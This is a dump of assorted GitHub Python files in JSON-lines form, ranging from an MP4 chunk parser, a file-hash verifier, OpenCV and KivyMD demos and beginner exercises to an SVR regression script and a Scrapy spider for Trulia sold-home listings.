\n cur.execute(\"PRAGMA table_info(FactorValues)\")\n cols = cur.fetchall()\n sqlStr=cols[0][1]+' '+cols[0][2]\n for t in cols[1:]:\n sqlStr+=','+t[1]+\" \"+t[2]\n cur.execute(\"DROP TABLE IF EXISTS ZScores\")\n cur.execute(\"CREATE TABLE ZScores({})\".format(sqlStr)) \n insertSql = \"?\"+\",?\"*(len(cols)-1)\n \n cur.execute(\"SELECT DISTINCT Date FROM FactorValues ORDER BY Date\")\n dates = cur.fetchall()\n for dt in dates:\n date = dt[0]\n i=0\n for indus in indusList:\n self.logger.info(\"<{}>-Process industy {}, {}\".format(__name__.split('.')[-1],indus[0],dt))\n cur.execute(\"SELECT * FROM FactorValues WHERE Date='{}' AND IndusCode in ({})\".format(date,indus[0]))\n #print \"SELECT StkCode FROM FactorValues WHERE Date='{}' AND IndusCode in ({})\".format(date,indus[0])\n rows = cur.fetchall()\n if len(rows)>0:\n i+=1\n _mat = []\n stkInfo = []\n for row in rows:\n stkInfo.append(row[0:8])\n _mat.append(row[8:])\n mat = numpy.array(_mat,dtype=numpy.float)\n\n w_mat = self.Winsorize(mat, 3) \n for k in xrange(len(stkInfo)):\n r = list(stkInfo[k])+w_mat[k,:].tolist()\n cur.execute(\"INSERT INTO ZScores VALUES ({})\".format(insertSql),tuple(r))\n #print i,indus,dt \n conn.commit()\n cur.execute(\"CREATE INDEX Id2 ON ZScores(Date,StkCode)\")\n conn.commit() \n\n\n","repo_name":"wusf/MyQunatLib","sub_path":"UpdateFactorDatabase/FundamentalFactors/ComputeFactorValues.py","file_name":"ComputeFactorValues.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74757740322","text":"#!/usr/bin/env python\nfrom datetime import datetime\nfrom datetime import timedelta\nimport os.path\nimport struct\nimport sys\n\n\ndef parse_box(f):\n buf = f.read(8)\n box_size = struct.unpack('>I', buf[:4])[0]\n box_type = str(buf[4:], 'utf-8')\n\n if box_size == 1:\n buf = f.read(8)\n box_size = struct.unpack('>Q', buf)[0]\n\n return box_size, box_type\n\n\ndef main(filename_in):\n containers = ('moov', 'trak', 'edts', 'mdia', 'minf', 'dinf', 'stbl')\n\n with open(filename_in, 'rb') as f_in:\n f_in.seek(0, 2)\n file_size = f_in.tell()\n\n cur = 0\n sc_table = []\n sz_table = []\n co_table = []\n while True:\n f_in.seek(cur)\n\n box_size, box_type = parse_box(f_in)\n if box_size == 0:\n box_size = file_size - cur\n\n if box_type in containers:\n box_size, box_type = parse_box(f_in)\n if box_size == 0:\n box_size = file_size - cur\n cur += 8\n elif box_type == 'stsc':\n # Sample-to-Chunk Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*12\n i1 = i0 + 12\n if len(buf) < i1: break\n first_chunk = struct.unpack('>I', buf[i0:i0+4])[0]\n samples_per_chunk = struct.unpack('>I', buf[i0+4:i0+8])[0]\n sample_desc_id = struct.unpack('>I', buf[i0+8:i0+12])[0]\n sc_table.append((first_chunk, samples_per_chunk, sample_desc_id))\n # print(f'{i:6d}: {(first_chunk, samples_per_chunk, sample_desc_id)}')\n elif box_type == 'stsz':\n #Sample Size Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n sample_size = struct.unpack('>I', buf[4:8])[0]\n n_entries = struct.unpack('>I', buf[8:12])[0]\n\n for i in range(n_entries):\n i0 = 12 + i*4\n i1 = i0 + 4\n if len(buf) < i1: break\n size = struct.unpack('>I', buf[i0:i1])[0]\n sz_table.append(size)\n # print(f'{i:6d}: {size}')\n elif box_type == 'stco':\n #Chunk Offset Atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*4\n i1 = i0 + 4\n if len(buf) < i1: break\n offset = struct.unpack('>I', buf[i0:i1])[0]\n co_table.append(offset)\n # print(f'{i:6d}: {offset}')\n elif box_type == 'co64':\n #64-bit chunk offset atoms\n buf = f_in.read(box_size - 8)\n\n version = buf[0]\n flags = buf[1:4]\n n_entries = struct.unpack('>I', buf[4:8])[0]\n\n for i in range(n_entries):\n i0 = 8 + i*8\n i1 = i0 + 8\n if len(buf) < i1: break\n offset = struct.unpack('>Q', buf[i0:i1])[0]\n co_table.append(offset)\n # print(f'{i:6d}: {offset}')\n\n if len(sc_table) != 0 and len(sz_table) != 0 and len(co_table) != 0:\n print('######################## ########################')\n i = 0\n l = 0\n while True:\n m0, n, _ = sc_table[i]\n if i + 1 < len(sc_table):\n m1 = sc_table[i + 1][0]\n else:\n m1 = len(co_table) + 1\n\n j = m0 - 1\n while True:\n offset = co_table[j]\n\n k = 0\n while True:\n cur_temp = f_in.tell()\n f_in.seek(offset)\n buf = bytes([0x00, 0x00]) + f_in.read(6)\n f_in.seek(cur_temp)\n binary = struct.unpack('>Q', buf)[0]\n mark = ' '\n if sz_table[l] < 100: mark = 'v'\n print(f'{mark}{offset:10d} {sz_table[l]:6d} {binary:059_b}')\n offset += sz_table[l]\n l += 1\n\n k += 1\n if k >= n:\n break\n\n j += 1\n if j >= m1 - 1:\n break\n\n i += 1\n if i >= len(sc_table):\n break\n print('')\n\n sc_table = []\n sz_table = []\n co_table = []\n\n cur += box_size\n if cur >= file_size:\n break\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(f'Usage: python {sys.argv[0]} in.mp4')\n sys.exit(1)\n\n filename_in = sys.argv[1]\n\n main(filename_in)\n","repo_name":"tknr/repair-corrupt-mp4","sub_path":"chunk.py","file_name":"chunk.py","file_ext":"py","file_size_in_byte":5484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30064178458","text":"from kivymd.app import MDApp\nfrom kivy.uix.screenmanager import Screen\nfrom kivymd.uix.button import MDIconButton\n# self.theme_cls.primary_palette = \"Purple\" no work on icon button\nclass MyApp(MDApp):\n def build(self):\n screen = Screen()\n screen.add_widget(\n MDIconButton(\n icon= \"android\", #use can use png path here\n pos_hint={\"center_x\":0.5,\"center_y\":0.5},\n user_font_size= \"128sp\", #by default 48sp\n )\n )\n return screen\nMyApp().run()","repo_name":"WithSJ/Learn-KivyMD","sub_path":"Widget testing/KivyMD Buttons/kivyMD IconButton.py","file_name":"kivyMD IconButton.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"74332831841","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\ndef three_sum(array):\n \"\"\"\n Given an array `array` of n integers, find one triplet\n in the array which gives the sum of zero.\n\n `array` must be in increasing order\n \"\"\"\n n = len(array)\n for i in range(n - 2):\n j = i + 1\n k = n - 1\n\n while k >= j:\n if array[i] + array[j] + array[k] == 0:\n return array[i], array[j], array[k]\n elif array[i] + array[j] + array[k] > 0:\n k = k - 1\n else:\n j = j + 1\n","repo_name":"Firkraag/algorithm","sub_path":"three_sum.py","file_name":"three_sum.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"54"} +{"seq_id":"13229676948","text":"#!/usr/bin/env python3\n\nfrom Crypto.Hash import SHA256\nimport os\nimport sys\n\ndef fileHash(filename:str)->bytes:\n \"\"\"Return hash value of a file\"\"\"\n file=open(filename,'rb')\n f_size=os.path.getsize(filename)\n if f_size/1024==0:\n seek_pos=f_size-1024\n else:\n seek_pos=f_size-f_size%1024\n block=None\n blocks=[]\n hash_val=bytes()\n while seek_pos>=0:\n file.seek(seek_pos)\n block=file.read(1024)+hash_val\n blocks.append(block)\n hash_val=SHA256.new(block).digest()\n seek_pos-=1024\n blocks.reverse()\n return hash_val,blocks\n\nclass PseudoReceive:\n blocks=[]\n nBlock=0\n hash_val=None\n curent_receive_index=-1\n def __init__(self,filename:str):\n \"\"\"Initialize pseudo receive instance object.\"\"\"\n self.hash_val,self.blocks=fileHash(filename)\n self.nBlock=len(self.blocks)\n self.curent_receive_index=-1\n\n def receiveNextBlock(self):\n self.curent_receive_index+=1\n if self.curent_receive_index>=len(self.blocks):\n print(\"Succesfully receive all blocks\")\n return self.curent_receive_index,None\n print(\"Receive block number \",self.curent_receive_index)\n return self.curent_receive_index,self.blocks[self.curent_receive_index]\n def getHashVal(self):\n return self.hash_val\n\ndef pseudoVerify(pseudoReceive:PseudoReceive)->bool:\n hash_val=pseudoReceive.getHashVal()\n while(True):\n cur_index,block=pseudoReceive.receiveNextBlock()\n if block is None:\n print(\"Verified status: OK\")\n return True\n if hash_val==SHA256.new(block).digest():\n print(\"Verify block number\",cur_index,\": OK\\n\")\n hash_val=block[-32:]\n else:\n print(\"verified status: ERROR\")\n return False\n\ndef main():\n filename=sys.argv[1]\n recv=PseudoReceive(filename)\n pseudoVerify(recv)\n print(\"HASH VALUE h0 is:\\n\",fileHash(filename)[0].hex())\n\nif __name__=='__main__':\n main()\n\n\n\n\n\n\n \n\n\n\n ","repo_name":"dangnh0611/cryptography1_coursera","sub_path":"Q3_video_hash/video_hash.py","file_name":"video_hash.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70794720802","text":"import numpy as np\nimport cv2\nimport math\n\n# Global variables\ncanvas = np.ones([500,500,3],'uint8')*255\n\ncolorRed = (255, 0, 0)\ncolorYellow = (255, 255, 0)\ncolorBlue = (0, 0, 255)\n\ncolorToPaint = colorRed\n# click callback\n\npointStart = (0, 0)\npointEnd = (0, 0)\nradius = 10\n\nline_width = 3\ndrawing = False\ndistance = 0\n\n\ndef click(event, x, y, flags, param):\n\n\tglobal canvas, pointStart, pointEnd, radius, drawing, distance\n\n\n\tif event == cv2.EVENT_LBUTTONDOWN:\n\t\tdrawing = True\n\t\tpointStart = (x, y)\n\t\t# cv2.circle(canvas, pointStart, radius, colorToPaint, line_width)\n\n\telif event == cv2.EVENT_MOUSEMOVE:\n\t\tif drawing == True:\n\t\t\tpointEnd = (x, y)\n\n\t\t\tdiff = (pointStart[0] - pointEnd[0]), (pointStart[1] - pointEnd[1])\n\n\t\t\tdistance = math.sqrt(math.pow((pointEnd[0] - pointStart[0]),2) + math.pow((pointEnd[1] - pointStart[1]),2))\n\n\t\t\tradius = int(distance)\n\n\t\t\tcanvas = np.ones([500, 500, 3], 'uint8') * 255\n\n\t\t\tcv2.circle(canvas, pointStart, radius, colorToPaint, line_width)\n\n\n\telif event == cv2.EVENT_LBUTTONUP:\n\t\tdrawing = False\n\t\tprint(distance)\n\n# window initialization and callback assignment\ncv2.namedWindow(\"canvas\")\ncv2.setMouseCallback(\"canvas\", click)\n\n# Forever draw loop\n\nwhile True:\n\n\tcv2.imshow(\"canvas\",canvas)\n\n\t# key capture every 1ms\n\tch = cv2.waitKey(1)\n\tif ch & 0xFF == ord('q'):\n\t\tbreak\n\telif ch & 0xFF == ord('r'):\n\t\tcolorToPaint = colorRed\n\telif ch & 0xFF == ord('b'):\n\t\tcolorToPaint = colorBlue\n\telif ch & 0xFF == ord('y'):\n\t\tcolorToPaint = colorYellow\n\n\ncv2.destroyAllWindows()\n\n\n\n\n","repo_name":"jarzab3/openCV","sub_path":"Ex_Files_OpenCV_Python_Dev/Ch02/02_10 Begin/02_10.py","file_name":"02_10.py","file_ext":"py","file_size_in_byte":1513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"8166658412","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom pandas import Series\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import mean_squared_error\n\nauto_data = pd.read_csv('../data/auto-mpg.data', delim_whitespace=True, header=None,\n names=['mpg','cylinders', 'displacement', 'horsepower', 'weight','acceleration', 'model',\n 'origin', 'car_name'])\nprint(auto_data.head())\n\n# the car name will now effect our training\nprint(len(auto_data['car_name'].unique()))\nprint(len(auto_data))\n\nauto_data = auto_data.drop('car_name', axis=1)\nprint(auto_data.head())\n\n# convert origin to one-hot presentation\nprint(auto_data['origin'].unique())\norigin_dict = {1: 'america', 2: 'europe', 3: 'asia'}\nauto_data['origin'] = auto_data['origin'].replace(origin_dict)\nauto_data = pd.get_dummies(auto_data, columns=['origin'])\nprint(auto_data.sample(5))\n\n# handling missing values\nauto_data = auto_data.replace('?', np.nan)\nauto_data = auto_data.dropna()\n\n# training our model\nX = auto_data.drop('mpg', axis=1)\nY = auto_data['mpg']\n\nX_train, x_test, Y_train, y_test = train_test_split(X, Y, test_size=0.2, random_state=0)\n\n# start with C=1.0 to 0.5 (better model)\nregression_model = SVR(kernel='linear', C=0.5)\nregression_model.fit(X_train, Y_train)\n\nprint(regression_model.score(X_train, Y_train))\n\npredictors = X_train.columns\ncoef = Series(regression_model.coef_[0], predictors).sort_values()\n# coef.plot(kind='bar', title='Modal Coefficients')\n# plt.show()\n\ny_predict = regression_model.predict(x_test)\n\n# plt.figure(figsize=(15, 6))\n# plt.plot(y_predict, label='Predicted')\n# plt.plot(y_test.values, label='Actual')\n# plt.ylabel('MGP')\n# plt.legend()\n# plt.show()\n\nprint(regression_model.score(x_test, y_test))\n\nregression_model_mse = mean_squared_error(y_predict, y_test)\nprint(regression_model_mse)\nprint(math.sqrt(regression_model_mse))\n","repo_name":"sharon12312/machine-learning-courses-pluralsight","sub_path":"machine-learning-models/exercises/models/regression/SVR.py","file_name":"SVR.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"37036518507","text":"from __future__ import unicode_literals, print_function, division\nimport json\n\nimport Models.utils as utils\nfrom Models.utils import *\nfrom Models.pointer_gen import *\nfrom Data.data_loader import *\nimport torch\n\nfrom tensorboardX import SummaryWriter\nfrom sumeval.metrics.rouge import RougeCalculator\nfrom pythonrouge.pythonrouge import Pythonrouge\n\nclass Scorer():\n def __init__(self, model):\n self.model = model\n self.sample_predictions = dict()\n self.test_samples = None\n self.beam_batch_size = 6\n self.rewards_to_score = {}\n\n\n\n def score_model(self, val_batches, use_cuda, beam, verbose=False, rouge_dist=True):\n\n results = []\n\n for b in range(len(val_batches)):\n preds = self.model.predict_v2(val_batches[b], 120, beam, use_cuda)\n for p in range(len(val_batches[b])):\n pair = val_batches[b][p]\n ref = pair.get_text(pair.full_target_tokens, self.model.vocab).replace(\" EOS\", \"\")\n if not beam:\n seq = [t[p] for t in preds]\n results.append({'ref': ref, 'seq': \" \".join([s['word'] for s in seq]).split(\" EOS\")[0]})\n results[-1]['p_gen'] = sum([s['p_gen'] for s in seq[:len(results[-1]['seq'])]]) / len(results[-1]['seq'])\n results[-1]['novelty'] = pair.compute_novelty([s['token_idx'] for s in seq[:len(results[-1]['seq'])]])\n else:\n results.append({'ref': ref, 'seq': preds[p][0][0].split(\" EOS\")[0]})\n results[-1]['p_gen'] = preds[p][0][2]\n results[-1]['novelty'] = pair.compute_novelty(\n pair.get_tokens(results[-1]['seq'].split(\" \"), self.model.vocab))\n\n results[-1]['novelty_v2'] = pair.compute_novelty_v2(\n [pair.get_tokens(text.split(\" \")+[\".\"], self.model.vocab)\n for text in results[-1]['seq'].split(\" . \")], self.model.vocab)\n\n results[-1]['ref_novelty'] = sum([sum(vec) / len(vec) for vec in pair.tri_gram_novelty_vector]) / \\\n len(pair.tri_gram_novelty_vector)\n\n for r in self.rewards_to_score:\n results[-1][r] = self.rewards_to_score[r].compute_reward([pair], [results[-1]['seq'].split(\" \")],\n self.model)[0]\n\n if b % 10 == 0 and verbose: print(b, \": \", len(val_batches))\n\n rouge_calc = RougeCalculator(stopwords=False, lang=\"en\")\n scores = {\"Rouge_1\": 0, \"Rouge_2\": 0, \"Rouge_L\": 0, \"Tri_novelty\": 0, \"p_gens\": 0, \"Tri_novelty_v2\": 0}\n scores['rouge_dist'] = {}\n for rouge in ['ROUGE-1-F', 'ROUGE-2-F', 'ROUGE-3-F', 'ROUGE-L-F']:\n scores['rouge_dist'][rouge] = []\n for k in range(21): scores['rouge_dist'][rouge].append([])\n\n for r in self.rewards_to_score: scores[r] = 0\n\n if verbose: print(\"Computing SumEval scores\")\n summaries, references = [], []\n\n for result in results:\n summaries.append(result['seq'])\n references.append(result['ref'])\n scores[\"Rouge_1\"] += (rouge_calc.rouge_1(result['seq'], result['ref']) *100)\n scores[\"Rouge_2\"] += (rouge_calc.rouge_2(result['seq'], result['ref']) *100)\n scores[\"Rouge_L\"] += (rouge_calc.rouge_l(result['seq'], result['ref']) *100)\n scores[\"Tri_novelty\"] += result['novelty']\n scores[\"Tri_novelty_v2\"] += result['novelty_v2']\n if 'p_gen' in result: scores[\"p_gens\"] += result['p_gen']\n for r in self.rewards_to_score: scores[r] += result[r]\n\n if rouge_dist:\n perl_scores = self.score_rouge_org([result['seq']], [result['ref']])\n for rouge in scores['rouge_dist']:\n scores['rouge_dist'][rouge][int(20*result['ref_novelty'])].append(perl_scores[rouge])\n\n for k in scores:\n if k is 'rouge_dist':\n for rouge in scores['rouge_dist']:\n scores['rouge_dist'][rouge] = [(sum(l)/len(l), len(l)) if len(l) > 0 else (0, 0) for l in scores['rouge_dist'][rouge]]\n\n else:\n scores[k] = scores[k] / len(results)\n\n if verbose: print(\"Computing Perl scores\")\n\n perl_scores = self.score_rouge_org(summaries, references)\n for k in perl_scores:\n if k[-1] != \"R\":\n id = \"R\" + k.replace(\"-\", \"_\").lower()[1:-1] + \"perl\"\n scores[id] = 100*perl_scores[k]\n\n return scores\n\n\n def score_rouge_org(self, sammaries, references):\n\n rouge = Pythonrouge(summary_file_exist=False,\n summary=[s.replace(\" . \", \" .\\n\").split(\"\\n\") for s in sammaries],\n reference=[[s.replace(\" . \", \" .\\n\").split(\"\\n\")] for s in references],\n n_gram=3, ROUGE_SU4=False, ROUGE_L=True,\n recall_only=False, stemming=True, stopwords=False,\n word_level=True, length_limit=False, length=150,\n use_cf=False, cf=95, scoring_formula='average',\n resampling=False, samples=1000, favor=True, p=0.5)\n return rouge.calc_score()","repo_name":"eivhav/Abstractive_Summarization","sub_path":"Evaluation/scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18263578858","text":"from typing import Tuple\n\nRELATIVE_DIRECTIONS = {\n 'U': (0, 1),\n 'D': (0, -1),\n 'L': (-1, 0),\n 'R': (1, 0),\n}\n\nGEOGRAPHICAL_DIRECTIONS = {\n 'N': (0, 1),\n 'S': (0, -1),\n 'W': (-1, 0),\n 'E': (1, 0),\n}\n\n\ndef get_direction(ch: str) -> Tuple[int, int]:\n \"\"\"Coordinates point for direction\n\n Args:\n ch: str - direction as a single letter UDLR or NEWS\n\n Returns:\n tuple (x, y) - direction coordinates.\n E.g.:\n N -> (0, 1) # north\n S -> (0, -1) # south\n L -> (-1, 0) # left\n\n Raises KeyError:\n if direction char not in allowed directions.\n \"\"\"\n try:\n return (\n RELATIVE_DIRECTIONS.get(ch, None) or\n GEOGRAPHICAL_DIRECTIONS[ch]\n )\n except KeyError:\n raise KeyError(\n f'No such direction {ch}. Available directions: NSWE and UDLR'\n )\n\n\ndef get_target_point(start: Tuple[int, int], steps: str) -> Tuple[int, int]:\n \"\"\"Coordinates of target point based on start point and steps.\n\n Args:\n start: tuple (x, y) - coordinates of the starting point.\n steps: string e.g U15 - contains direction (U D L R or N E S W)\n and number of steps.\n\n Directions - two direction systems are possible:\n Relative orientations:\n U - Up -> (0, 1)\n D - Down -> (0, -1)\n L - Left -> (-1, 0)\n R - Right -> (1, 0)\n\n Geographical directions:\n N - North -> (0, 1)\n E - East -> (1, 0)\n S - South -> (0, -1)\n W - West -> (-1, 0)\n\n Returns:\n tuple (x, y) - coordinates of the target point.\n \"\"\"\n x, y = start\n ch, n = steps[0], int(steps[1:])\n dx, dy = get_direction(ch)\n return x + n * dx, y + n * dy\n\n\ndef path_points(start, steps):\n \"\"\"Generate coordinates of each path point based on start point and steps.\n\n Args:\n start: tuple (x, y) - coordinates of the starting point.\n steps: string e.g U15 - contains direction (UDLR or NESW)\n and number of steps.\n\n Directions - two direction systems are possible:\n Relative orientations:\n U - Up -> (0, 1)\n D - Down -> (0, -1)\n L - Left -> (-1, 0)\n R - Right -> (1, 0)\n\n Geographical directions:\n N - North -> (0, 1)\n E - East -> (1, 0)\n S - South -> (0, -1)\n W - West -> (-1, 0)\n\n Yields:\n tuple (x, y) - point.\n \"\"\"\n x, y = start\n ch, n = steps[0], int(steps[1:])\n dx, dy = get_direction(ch)\n tx, ty = x + n * dx, y + n * dy\n\n while not (x == tx and y == ty):\n x += dx\n y += dy\n yield x, y\n","repo_name":"lenarother/santa-helpers","sub_path":"santa_helpers/paths.py","file_name":"paths.py","file_ext":"py","file_size_in_byte":2710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26777003772","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\nimport time\nfrom setuptools import setup, find_packages\n# from stopwords-zh import __version__\n\nversion = time.strftime(\"%Y.%m.%d.%H.%M.%S\", time.localtime())\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nwith open('requirements.txt', encoding='utf-8') as f:\n requirements = f.read().split('\\n')\n\nsetup(\n author=\"stopwords-zh\",\n author_email='yuanjie@example.com',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"stopwords-zh\",\n entry_points={\n 'console_scripts': [\n 'stopwords=stopwords.clis.cli:cli'\n ],\n },\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n long_description_content_type=\"text/markdown\",\n include_package_data=True,\n keywords='stopwords-zh',\n name='stopwords-zh',\n packages=find_packages(include=['stopwords', 'stopwords.*']),\n\n test_suite='tests',\n url='https://github.com/yuanjie-ai/stopwords-zh',\n version=version, # '0.0.0',\n zip_safe=False,\n)\n\n","repo_name":"yuanjie-ai/stopwords-zh","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"54"} +{"seq_id":"15451275251","text":"print('*** Калькулятор ***')\nfirst_num = float(input('Введіть перше число : '))\nsecond_num = float(input('Введіть друге число: '))\noperators = input('Що з ними зробити?: ')\nif operators == '+':\n print(first_num + second_num)\nelif operators == '-':\n print(first_num - second_num)\nelif operators == '/':\n if second_num == 0:\n print('На 0 ділити не можна!')\n print(first_num/second_num)\nelif operators == '*':\n print(first_num*second_num)\nelif operators == '**':\n print(first_num**second_num)\nelse:\n print('Невідомий оператор')\n\nprint('\\n*** Квадрати натуральних чисел ***')\nnumber = int(input('Введіть число: '))\nfor i in range(1, number):\n if i**2 < number:\n print(i**2, end=' ')\n\n\nnumber = int(input('Введіть Ваше число: '))\nfor i in range(2, number // 2 + 1):\n if number % i == 0:\n print('Складене число')\n break\nelse:\n print('Просте число')\n\n\nprint('\\n*** Задача про гриби ***')\nmushroom = int(input('Кількість грибів: '))\nlast_num = int(mushroom) % 10\nexception = int(mushroom) % 100\nvariable_pass = (' ')\nvariable_range = ('а')\nvariable_else = ('ів')\nif last_num < 10 and exception == 11 or exception in range(12,15):\n print((f'Маша знайшла у лісі {mushroom} гриб{variable_else}'))\nelif last_num == 1:\n print(f'Маша знайшла у лісі {mushroom} гриб{variable_pass}')\nelif last_num in range(2, 5):\n print(f'Маша знайшла у лісі {mushroom} гриб{variable_range}')\nelse:\n print((f'Маша знайшла у лісі {mushroom} гриб{variable_else}'))\n","repo_name":"arulik/Lesson1","sub_path":"lesson3.py","file_name":"lesson3.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74569876642","text":"alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\ndef caesar(message, shift, shift_direction):\n if shift_direction == \"decode\":\n shift *= -1\n result = \"\"\n for char in message:\n shifted_char_index = (alphabet.index(char) + shift) % 26\n result += alphabet[shifted_char_index]\n return result\n\nsession_active = True\n\nwhile session_active:\n command = input(\"Type 'encode' to encrypt, type 'decode' to decrypt: \")\n message = input(\"Type your message: \")\n message = list(message.replace(\" \",\"\").lower())\n shift_number = int(input(\"Type your shift number: \"))\n shifted_message = caesar(message, shift_number, command)\n print(f\"Your {command}d message is: {shifted_message}\\n\")\n keep_going = input(\"Would you like to have another go? Type 'yes' or 'no': \")\n print()\n session_active = bool(keep_going == \"yes\")\n\n","repo_name":"kalikokalikova/100_days_of_python","sub_path":"day_8.py","file_name":"day_8.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12201053163","text":"\n####################################################################################################\n\nfrom scrapy import Spider, Request\nfrom nyz.items import nyzItem\nimport re\n\n####################################################################################################\n\nclass nyzliteSpider(Spider):\n\tname \t\t\t= \"nyz_lite_spider\"\n\tallowed_urls \t= ['https://www.trulia.com/']\n\tstart_urls \t\t= [\n\t'https://www.trulia.com/sold/New_York,NY/', \n\t'https://www.trulia.com/sold/Brooklyn,NY/', \n\t'https://www.trulia.com/sold/Bronx,NY/',\n\t'https://www.trulia.com/sold/36081_c/',\n\t'https://www.trulia.com/sold/Staten_Island,NY/']\n\n####################################################################################################\n\t\n\tdef parse(self, response):\n\t\tprint(response)\n\t\t# Determining number of result pages that distribute the total number of listings:\n\t\tof_total_listings \t\t\t= response.xpath(\"//div[@class = 'txtC h6 typeWeightNormal typeLowlight']/text()\").extract_first()\n\t\ta, results_per_page, total \t= map(lambda x: int(x), re.findall('\\d+', of_total_listings))\n\t\tnumber_result_pages \t\t= (total // results_per_page) + 1\n\t\t# list comprehension to generate each result page's url iterated over the number of result pages:\n\t\tresult_urls \t\t\t\t= [ str(response)[5:-1] + '{}_p/'.format(x) for x in range(1, number_result_pages+1)] #[0:1]# TEST RUN\n\t\tprint(result_urls[:2])\n\t\t# Request to yield each results page for next level parsing:\n\t\tfor url in result_urls:\n\t\t\tyield Request(url=url, callback=self.parse_result_page_listing)\n\n####################################################################################################\n\n\t# def parse_result_page(self, response):\n\t# \t# List of urls to individual page for each separate listing.\n\t# \t# Step = 3 slicing, since there are 3 identical href attributes in 3 <a> tags:\n\t# \tindv_listing_page_url \t= response.xpath(\"//div[@class = 'card boxBasic backgroundBasic']//a/@href\").extract()[::3]\n\t# \t# Request to yield each individual listing page for next level parsing:\n\t# \tfor url in indv_listing_page_url:\n\t# \t\tyield Request(url= 'https://www.trulia.com'+url, callback=self.parse_listing_page)\n\n####################################################################################################\n\n\tdef parse_result_page_listing(self, response):\n\t\t# extracting features(variables) of the listing using unique x.paths (and indexing & subscripting):\n\t\tpage_listings = response.xpath('//li[@class=\"xsCol12Landscape smlCol12 lrgCol8\"]')\n\t\tfor listing in page_listings:\n\t\t\tsoldPrice\t\t= listing.xpath(\".//span[@class='cardPrice h5 man pan typeEmphasize noWrap typeTruncate']/text()\").extract()\n\t\t\tsoldDate \t\t= listing.xpath(\".//div[@class = 'cardFooter soldFooter typeWeightNormal typeLowlight cardFooter man ptn phm']/a/text()\").extract()[1::2]\n\t\t\t\n\t\t\tsqft_list\t\t= listing.xpath(\".//ul[@data-testid='cardDescription']//li\").extract()\t\t#list of <li> tags\n\t\t\tsqft_values\t\t= listing.xpath(\".//ul[@data-testid='cardDescription']//text()\").extract() \t# cannot take NA for missing values\n\t\t\tsqft \t\t\t= [0] * len(sqft_list)\n\t\t\tj=0\t\n\t\t\tfor i in range(len(sqft_list)):\n\t\t\t\ttemp \t\t= sqft_values[j]\n\t\t\t\tif 'class=\"iconBed typeReversed\"' in sqft_list[i]:\n\t\t\t\t\tsqft[i]\t= \"\"\n\t\t\t\telse:\n\t\t\t\t\tsqft[i] = temp\n\t\t\t\t\tj \t\t+= 1\n\t\t\taddress\t\t\t= listing.xpath(\".//span[@itemprop='streetAddress']/text()\").extract()\n\t\t\tcity\t\t\t= listing.xpath(\".//span[@itemprop='addressLocality']/text()\").extract()[1::3]\n\t\t\tzipCode\t\t\t= listing.xpath(\".//span[@itemprop='postalCode']/text()\").extract()\n\t\t\t\n\t\t\t# Appending spider object(acts like dictionary) with features per listing (populating columns for each row/listing):\n\t\t\tlisting \t\t\t\t\t= nyzItem()\n\t\t\tlisting['soldPrice'] \t\t= soldPrice\n\t\t\tlisting['soldDate'] \t\t= soldDate\n\t\t\tlisting['sqft'] \t\t\t= sqft\n\t\t\tlisting['address'] \t\t\t= address\n\t\t\tlisting['city'] \t\t\t= city\n\t\t\tlisting['zipCode'] \t\t\t= zipCode\n\t\t\t\n\t\t\tyield listing\n\n####################################################################################################\n# <li class=\"iconBed typeReversed\"></li>\n# <span itemprop=\"addressLocality\" 